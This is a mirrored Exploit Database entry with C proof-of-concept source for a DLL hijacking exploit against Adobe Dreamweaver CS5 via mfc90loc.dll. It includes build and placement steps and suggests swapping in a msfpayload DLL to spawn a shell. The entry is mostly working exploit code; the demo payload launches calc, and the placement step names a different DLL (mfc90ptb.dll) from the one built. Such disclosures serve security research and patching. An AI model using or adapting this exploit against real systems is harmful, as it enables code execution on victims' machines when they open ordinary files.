Adobe Dreamweaver CS5 11.0 build 4909 – ‘mfc90loc.dll’ DLL Hijacking

• Exploit Database
• 7 阅读

• 作者： diwr
  日期： 2010-08-25
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/14740/

• /*
  # Exploit Title: Adobe Dreamweaver CS5 DLL Hijacking Exploit (mfc90loc.dll)
  # Date: 25/08/2010
  # Author: Bruno Filipe (diwr) http://digitalacropolis.us
  # Software Link: http://www.adobe.com <http://www.bsplayer.org>
  # Version: <= 11.0 build 4909
  # Tested on: WinXP SP2, WinXP SP3
  # Other Adobe CS5 products may be vulnerable too.
  # Thx TheLeader ;)
  #
  ----------------------------------------------------------------------------------------------------------
  # This should work with any file handled by Dreamweaver (.php, .asp, etc)
  # 1. gcc dllmain.c -o mfc90loc.dll
  # 2. Put mfc90ptb.dll in the same directory of a file handled by Dw (EG:
  anything.php)
  # 3. You can generate a msfpayload DLL and spawn a shell, for example.
  #
  ----------------------------------------------------------------------------------------------------------
  */
  
  #include <windows.h>
  
  int main()
  {
  WinExec("calc", SW_NORMAL);
  exit(0);
  return 0;
  }
  
  BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
  {
  main();
  return 0;
  }